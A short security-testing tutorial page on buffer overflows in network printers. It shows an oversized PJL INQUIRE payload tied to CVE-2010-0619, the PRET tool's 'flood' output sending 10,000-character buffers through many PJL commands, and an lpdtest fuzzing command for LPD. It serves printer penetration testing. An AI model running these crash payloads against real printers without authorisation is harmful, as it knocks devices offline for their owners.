Buffer Overflows

PJL

Various Lexmark laser printers crash when when receiving about 1.000 characters as the INQUIRE argument (see CVE-2010-0619) and sending about 3.000 characters as the SET argument to the Dell 1720n crashes the device:

@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…

You can check for Buffer Overflows using PRET:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"

LPD daemon

It allows multiple user-defined vectors like jobname, username or hostname, which may not be sufficiently protected. Several vulnerabilities related to this malfunction has been already discovered.

A simple LPD fuzzer to test for buffer overflows can be created using the lpdtest tool included in PRET. The in argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):

./lpdtest.py printer in "`python -c 'print "x"*150'`"

You can find more information about these attacks in http://hacking-printers.net/wiki/index.php/Buffer_overflows****